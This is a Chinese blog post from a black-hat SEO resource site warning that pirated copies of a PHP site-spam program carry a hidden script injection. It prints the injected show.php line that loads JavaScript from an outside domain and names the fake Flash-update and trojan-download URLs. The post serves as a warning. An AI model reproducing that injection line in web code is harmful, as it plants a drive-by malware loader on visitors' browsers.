网站首页 站群教程 原创站群教程 正文
据悉,因盗版“科普一下”泛二级程序疑似强制加载JS木马,此事件已导致程序作者“新程序已上线”心态爆裂,解散QQ群,并停止更新程序。
诱因是因为程序作者还没发布,盗版已经漫天飞舞,在各大二手交易平台肆意传播。
人作者只卖1000u,而盗版份子却卖5000u,割韭菜飞起,导致程序作者“新程序已上线”心里不平衡,灰心丧气后无意更新程序,无意继续带大家学习php。
特别提示
本站发布程序已经过“新程序已上线”本人授权,无偿提供给各位爱学习的网友,本地断网学习php语言。
通过本地调试,我们可以学习到如何使用php进行调用根目录下指定文件夹内随机文本文件的随机行,以及在线获取某个html页面标题、内容的方式,充分体悟到php语言的独特魅力。
后门变木马
据热心网友消息:在某鱼上购买的“科普一下”泛二级程序的show.php中,第647行,添加了:
$moban = str_replace( "</html>", "\r\n</html><!--新程序-->\r\n<script type=\"text/javascript\" src=\"https://www.flash-zh.com/flash.js\" charset=\"UTF-8\"></script>",$moban);
如下图所示:
该域名网站标题为“Flash官网-Flash Player下载 _Flash中心_重橙网络”,明显意思盗版flash网站。
且该域名注册时间为:2023年3月15日,明显就是新注册的。
经过测试测试发现:当html页面加载该JS时,会弹出窗口告知你需要立刻升级flash
如果你点击“立刻升级”,则会跳转至网站:https://down.flashs.one/download/
但显然该网站是:2023年3月23日新注册的
当我们点击下载,它会下载:flashcenter_pp_ax_install_cn.exe这个文件
为安全起见,将该文件上传至服务器测试,立刻报毒。
后面我们还尝试进行了安装测试,由于略感恐怖,操作到一般直接关闭所有进程,全盘查杀。
后且对该文件进行了木马云查杀,确信的确就是木马文件!
所以说大家赶紧排查一下吧!
- 上一篇: 关于“零度蜘蛛统计程序”有js后门的谣言解析
- 下一篇: 网站被加入JS后门的处理方法
必看说明
- 本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。
- 本站文章或仅为文本内容原创,非程序原创。如有侵权、不妥之处,请联系站长第一时间删除。敬请谅解!
- 本站所有内容严格遵守国家法律的条例,所有研究的算法技术均来源于搜索引擎公开默认允许用户研究使用的接口。
- 阅读本文及获取资源前,请确保您已充分阅读并理解《访问曹操SEO网站需知:行为准则》。
- 本站分享的任何工具、程序仅供学习参考编写架构,仅可在本地的虚拟机内断网测试,严禁联网运行或上传搭建!
- 任何资源必须在下载后24个小时内,从电脑中彻底删除。不得传播或者用于其他任何用途!否则一切后果用户自负!
- 转载请注明 : 文章转载自 曹操资源网 警惕:盗版“科普一下”泛二级程序强制加载JS木马
- 本文标题:《警惕:盗版“科普一下”泛二级程序强制加载JS木马》
- 本文链接:http://www.ccooc.cc/1266.html
猜你喜欢
- 2023-05-10 买卖备案域名的法律规定
- 2023-05-10 寄生虫推广,一种黑帽SEO优化手法
- 2023-05-10 黑帽SEO手段之泛站群
- 2023-05-10 百度搜索API参数详解
- 2023-05-07 卓越关键词自动拓展采集工具
- 2023-04-24 深入解读百度PC端搜索链接参数
- 2023-04-24 深入解析百度搜索中的参数以及其作用
- 2023-04-24 深入了解百度搜索命令中的参数
- 2023-04-24 百度搜索URL参数详解:含义、作用及使用方法
- 2023-04-24 百度搜索URL的所有参数都有哪些含义?
你 发表评论:
欢迎- 05-26警惕“冒用身份”的电信网络诈骗
- 05-11PHP使用纯真IP数据库输出ip位置
- 05-11ChatGPT的高效应用:指令大全
- 05-10堤防“瑞熙工作室”利用QQ及微信诈骗
- 05-10手机狐狸网资讯站群程序
- 05-10使用php在拼音转文字时过滤掉标点符号及英文字符
- 05-10买卖备案域名的法律规定
- 05-10泛目录站群的操作方法及注意事项
- 2007℃小米浏览器禁止网址访问的处理方法
- 861℃分析超度站群实现百度本周收录较多的站点
- 713℃免费的百度SEO搜索点击程序
- 701℃网站如何才能快速收录?
- 688℃我站最新联系方式通知
- 668℃搜狗推送链接引蜘蛛软件:Sougou推送程序
- 667℃CCbook小说站群无限制版
- 664℃使用Google账号接码指南
- 164℃警惕“冒用身份”的电信网络诈骗
- 141℃「百日行动」“断卡”行动持续发力
- 132℃遵纪守法:一起举报违法网址
- 342℃提防以免费做蜘蛛池为幌子卖域名的套路
- 522℃群内一切的私下交易行为,与我站无关!
- 176℃堤防“瑞熙工作室”利用QQ及微信诈骗
- 418℃提防“凤凰于飞”诈骗,加强网络安全认知!
- 502℃关于近期网站内容修改短期闭站的情况通知
- 文章归档
-
- 2023年5月 (17)
- 2023年4月 (45)
- 2023年3月 (23)
- 2023年2月 (9)
- 2023年1月 (11)
- 2022年12月 (9)
- 2022年11月 (4)
- 2022年10月 (33)
- 2022年9月 (41)
- 2022年8月 (19)
- 2022年7月 (19)
- 2022年6月 (20)
- 2022年5月 (9)
- 2022年4月 (42)
- 2022年3月 (65)
- 2022年2月 (1)
- 2022年1月 (4)
- 2021年12月 (23)
- 2021年11月 (2)
- 2021年10月 (4)
- 2021年9月 (22)
- 2021年8月 (70)
- 2021年7月 (1)
- 2021年6月 (21)
- 2021年5月 (28)
- 2021年4月 (1)
- 2021年3月 (42)
- 2021年1月 (8)
- 2020年12月 (34)
- 2020年11月 (15)
- 2020年10月 (39)
- 2020年9月 (107)
- 2020年8月 (37)
- 2020年7月 (22)
- 2020年6月 (46)
- 2020年5月 (120)
- 2020年4月 (76)
- 2020年3月 (81)
- 2020年2月 (69)
- 2020年1月 (14)
- 2019年12月 (38)
- 2019年11月 (11)
- 2019年10月 (25)
- 2019年9月 (2)
- 2017年10月 (1)
- 标签列表
- 站点信息
-
- 文章总数:1332
- 页面总数:1
- 分类总数:47
- 标签总数:337
- 评论总数:39
- 浏览总数:245225
本文暂时没有评论,来添加一个吧(●'◡'●)